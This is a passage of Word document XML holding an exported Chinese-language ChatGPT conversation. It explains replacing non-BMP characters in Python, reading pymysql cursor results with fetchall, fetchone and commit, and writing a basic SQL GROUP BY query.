    <w:p w14:paraId="50DE802A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是请注意，这只是一个简单的处理方法。如果你的应用需要保留所有字符，包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，那么最好解决字符编码问题，而不是简单地移除这些字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E7A939" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C539AA5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你想将这些字符替换为某个指定的字符，你可以将上述函数稍作修改：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E60627D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52AF4F3C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F88D7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def replace_non_bmp_characters(data, replacement=''):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B163FD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2555D07B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Replaces non-BMP (not Basic Multilingual Plane) characters in a string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BC3FD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720AC1C9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    bmp_chars = ''.join((c if c &lt;= '\uFFFF' else replacement) for c in data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B9260C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return bmp_chars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F54EBC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BDA5ADD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你获取数据后，清理它：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC9E96" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>data = "your data here with some bad characters..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BCB338" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cleaned_data = replace_non_bmp_characters(data, replacement='?')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56340CD6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DD4F00" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码将不在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内的字符替换为你指定的字符（在这个例子中是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'?'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C8400" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D0B509" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conn = mysql_pool.connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE0D96" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        with conn.cursor() as cur:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何看到游标执行后的返回结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BFBDF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679A85AE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E076517" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pymysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库进行数据库操作时，你需要通过游标来执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令并获取结果。这里有一些基本的示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBDE703" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C545F1E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询数据（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD1D3A5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB1414D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22F113" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conn = mysql_pool.connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29875865" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>with conn.cursor() as cur:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4856E326" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute("SELECT * FROM my_table")  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换为你的查询语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4854F515" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = cur.fetchall()  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取所有的查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4AFD05" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for row in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD99338" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF17C1F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5133949E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上述代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fetchall()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将获取到查询的所有结果，返回一个列表，列表中的每个元素代表一行数据，数据类型通常为元组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D945B1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24537E67" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你只需要获取查询结果的一行数据，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fetchone()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32250CDC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526B2CC9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A20531" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conn = mysql_pool.connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AE1168" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>with conn.cursor() as cur:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDE65C5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute("SELECT * FROM my_table")  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换为你的查询语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F3301A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = cur.fetchone()  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取查询结果的第一行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508920BF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA2E48" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8E5366" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入、更新或删除数据（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2268B0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721712DC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B638D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conn = mysql_pool.connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53670C23" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>with conn.cursor() as cur:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3349748E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute("INSERT INTO my_table (col1, col2) VALUES ('value1', 'value2')")  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换为你的插入语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24093D43" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.commit()  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须提交事务，否则更改不会生效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117FE65F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B5725F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，对于插入、更新或删除操作，你必须调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法提交事务，否则更改不会被保存到数据库中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F198A1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1079248B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句怎么写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127BA9FD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34F8F2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643F31EE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GROUP BY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句是用来将返回的数据按照一列或多列的值进行分组的。这在你需要对一列或多列的数据进行聚合操作（如求和、计数、求平均、求最大值、求最小值等）时非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B6561" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1D25FD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一些基本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GROUP BY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F471607" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4524F072" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GROUP BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35292074" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CED038" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A16B228" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT column1, column2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDA31E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>FROM table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D276FAC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>GROUP BY column1, column2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF3CEB0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004CE812" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的语句会按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> column1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> column2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的数据进行分组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216F9B82" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51ADA112" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
